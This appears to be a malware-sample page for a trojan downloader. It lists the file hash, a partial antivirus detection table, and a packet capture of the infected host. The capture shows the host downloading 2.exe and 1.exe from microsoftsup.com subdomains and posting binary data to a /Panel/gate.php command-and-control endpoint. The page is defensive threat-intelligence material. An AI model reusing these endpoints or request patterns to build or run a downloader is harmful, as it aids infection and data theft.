microsoftsup.com POST /gate.php Trojan Malware Downloader PCAP file download traffic sample

SHA256: 55754d7bc221d58cebc24daeb3476fa2dbfdaf6ab75e9d3a30456dd5cbf589e5
File name: 2.exe
Detection ratio: 49 / 56
Analysis date: 2016-11-16 03:38:39 UTC
Engine                    Result                                        Update
ALYac                     Trojan.Generic.19684864                       20161116
AVG                       Win32/Blacked                                 20161116
AVware                    Trojan.Win32.Generic!BT                       20161116
Ad-Aware                  Trojan.Generic.19684864                       20161116
AegisLab                  Troj.W32.Generic!c                            20161116
AhnLab-V3                 Trojan/Win32.Generic.N2111031230              20161116
Antiy-AVL                 Trojan[:HEUR]/Win32.AGeneric                  20161116
Arcabit                   Trojan.Generic.D12C5E00                       20161116
Avast                     Win32:Adware-gen [Adw]                        20161116
Avira (no cloud)          TR/Black.Gen2                                 20161116
Baidu                     Win32.Packed.VMProtect.a                      20161115
BitDefender               Trojan.Generic.19684864                       20161116
Bkav                      HW32.Packed.509F                              20161112
CAT-QuickHeal             TrojanPWS.Fareit                              20161115
ClamAV                    Win.Trojan.Generic-1750                       20161116
Comodo                    UnclassifiedMalware                           20161116
CrowdStrike Falcon (ML)   malicious_confidence_100% (W)                 20161024
Cyren
2016-11-15 19:21:22.301485 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..NF.@…p….f;.D….P…}.p.sP…H”..GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-usmicrosoftsup.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive

2016-11-15 19:21:22.559324 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4F.@…q….f;.D….P…..p.s………..

E..(Gq@…p….f;.D….PF..o..}^P…”………
2016-11-15 19:21:36.592725 IP 192.168.1.102.53491 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8Gr@…o….f;.D….PF..o..}^P….|..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 337
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(Gw@…p….f;.D….P^……5P………….
2016-11-15 19:21:37.954398 IP 192.168.1.102.53492 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
E…Gx@…p….f;.D….P^……5P…….GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)